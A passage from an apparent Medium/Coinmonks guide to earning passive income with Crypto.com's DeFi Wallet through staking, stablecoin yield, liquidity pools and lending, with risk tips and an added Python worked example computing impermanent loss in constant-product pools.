- Open DeFi Wallet
- Select Earn
- Choose CRO Staking
- Select a validator
- Stake your CRO
Typical APYs fluctuate based on network conditions, but CRO staking remains one of the most stable DeFi income options.
Strategy 2: Stablecoin DeFi Yield (Lower Volatility)
If you prefer income without price swings, stablecoins are your friend.
Common Stablecoin Options:
- USDC
- USDT
- DAI
Where Stablecoin Yield Comes From:
- Lending protocols
- Liquidity pools
- Automated market makers (AMMs)
Benefits:
- Reduced volatility
- Predictable yield
- Ideal for capital preservation
This approach is especially attractive for investors focused on debt reduction, cash-flow stability, or income replacement strategies.
Is Stablecoin Yield Safer Than Crypto Staking?
Stablecoin yield strategies are generally less volatile than crypto staking because the stablecoins themselves are pegged to fiat currencies such as the U.S. dollar, so the principal does not swing with the market. They still carry smart contract and protocol risk.
Stablecoins are therefore often used for income stability and capital preservation.
Strategy 3: Liquidity Pools (Higher Yield, Higher Risk)
Liquidity pools allow you to earn:
- Trading fees
- Incentives
- Yield rewards
Example:
Providing CRO/USDC liquidity on Cronos dApps.
Pros:
- Higher APYs
- Multiple income streams
Cons:
- Impermanent loss
- Smart contract risk
This strategy is best for experienced investors who understand DeFi mechanics and risk management.
What Is Impermanent Loss in DeFi?
Impermanent loss occurs when the price of tokens in a liquidity pool changes compared to holding them individually, potentially reducing overall returns despite earning trading fees.
It is a key risk factor when providing liquidity in DeFi protocols.
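The passage above defines impermanent loss in words; the following is an added worked example (not code from the original article or from Crypto.com) that makes the number concrete for a constant-product pool, the x * y = k model used by the automated market makers mentioned earlier. The CRO/USDC amounts and the price move are constructed for illustration; the closed form 2*sqrt(r)/(1+r) - 1, where r is the ratio of the new price to the entry price, is the standard result for this pool type.

```python
from math import sqrt

# Constructed example: a constant-product (x * y = k) pool such as the
# CRO/USDC pair named in the article. Token amounts and prices are made up.


def lp_value_after_move(x0, y0, price_ratio):
    """Value, in units of token y, of a deposit (x0, y0) after the price of
    token x changes by the factor price_ratio.

    The pool keeps x * y constant; arbitrage moves its reserves until the
    pool's implied price (y / x) equals the new external price.
    """
    k = x0 * y0
    p0 = y0 / x0            # entry price of x measured in y
    p1 = p0 * price_ratio   # external price after the move
    # solve x1 * y1 = k and y1 / x1 = p1
    x1 = sqrt(k / p1)
    y1 = sqrt(k * p1)
    return x1 * p1 + y1     # both reserves valued at the new price


def hodl_value(x0, y0, price_ratio):
    """Value of the same deposit if it had simply been held instead."""
    p0 = y0 / x0
    return x0 * p0 * price_ratio + y0


def impermanent_loss_simulated(x0, y0, price_ratio):
    """Impermanent loss as a fraction: LP value relative to holding, minus 1."""
    return lp_value_after_move(x0, y0, price_ratio) / hodl_value(x0, y0, price_ratio) - 1


def impermanent_loss(price_ratio):
    """Closed form for constant-product pools: 2*sqrt(r)/(1+r) - 1.

    Always <= 0, symmetric in r and 1/r, and 0 only when the price is unchanged.
    """
    return 2 * sqrt(price_ratio) / (1 + price_ratio) - 1


def net_result_vs_hodl(price_ratio, fee_yield):
    """Whether collected fees (as a fraction of the deposit) cover the loss.

    Returns the LP's outcome relative to holding: negative means the fees
    earned did not compensate for impermanent loss.
    """
    return impermanent_loss(price_ratio) + fee_yield


if __name__ == "__main__":
    # Constructed scenario: deposit 1000 CRO and 1000 USDC, CRO then 4x in price.
    for r in (0.25, 1.0, 2.0, 4.0):
        print(f"price ratio {r:>5}: IL = {impermanent_loss(r):+.4f}")
    print("net vs hodl at 4x with 5% fees:", net_result_vs_hodl(4.0, 0.05))
```

Reading the output: a 4x move in either direction costs about 20% relative to simply holding the two tokens, and the LP only comes out ahead of holding when accumulated fees and incentives exceed that figure. The loss is "impermanent" in the sense that it shrinks to zero if the price returns to the entry ratio before you withdraw.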
Strategy 4: DeFi Lending Protocols
Some DeFi platforms allow you to lend your crypto to borrowers and earn interest.
How Lending Generates Income:
- Borrowers pay interest
- Smart contracts automate repayments
- Collateral protects lenders
Ideal Assets:
- Stablecoins
- Blue-chip cryptocurrencies
This method closely resembles traditional interest-based finance, but without banks acting as middlemen.
Step 4: Using the Built-In Web3 Browser
Crypto.com’s DeFi Wallet includes a Web3 browser, giving access to vetted DeFi protocols.
How to Use It:
- Open DeFi Wallet
- Tap Browser
- Select a DeFi app
- Connect your wallet
- Review terms before depositing
Always:
- Verify URLs
- Avoid unknown dApps
- Start with small amounts
Is Crypto.com’s DeFi Wallet Safe?
Crypto.com’s DeFi Wallet is considered secure because it is non-custodial, open-source, and requires users to manage their own private keys.
Security ultimately depends on user practices, such as protecting recovery phrases and avoiding unverified DeFi apps.
Step 5: Managing Risk Like a Professional
Passive income doesn’t mean risk-free income.
Smart Risk Management Tips:
- Diversify across strategies
- Avoid chasing unsustainable APYs
- Use stablecoins for balance
- Monitor protocol updates
- Never invest money you can’t afford to lock up
Think of DeFi as a portfolio tool, not a lottery ticket.
Step 6: Tracking and Reinvesting Your Earnings
Best Practices:
- Track yields monthly
- Reinvest rewards strategically
- Convert profits to stablecoins
- Periodically rebalance
Compound interest remains one of the most powerful wealth-building forces — especially in DeFi.
Common Mistakes to Avoid
- Ignoring smart contract risk
- Falling for fake APY promises
- Storing seed phrases digitally
- Over-allocating to one protocol
- Forgetting about gas fees
Avoiding these mistakes alone can dramatically improve long-term returns.
Is Crypto.com DeFi Wallet Safe?
Security depends largely on user behavior.
Safety Strengths:
- Non-custodial
- Transparent smart contracts
- Established ecosystem
- Regular updates
Your biggest risk isn’t the wallet — it’s poor operational security.
Who Should Use Crypto.com’s DeFi Wallet?
This wallet is ideal for:
- Passive income seekers
- Crypto beginners entering DeFi
- Long-term CRO holders
- Investors diversifying away from banks
- Individuals rebuilding finances or reducing debt through alternative income
Final Thoughts: Is Crypto.com DeFi Wallet Worth It for Passive Income?
If you’re serious about earning passive income with crypto, Crypto.com’s DeFi Wallet offers a balanced entry point into decentralized finance.
It combines:
- Self-custody
- Real yield opportunities
- Beginner-friendly design
- Access to advanced DeFi strategies
In a financial system increasingly defined by inflation, debt, and centralized control, learning how to generate decentralized income is no longer optional — it’s strategic.
Step-by-Step: How to Use Crypto.com’s DeFi Wallet for Passive Income was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.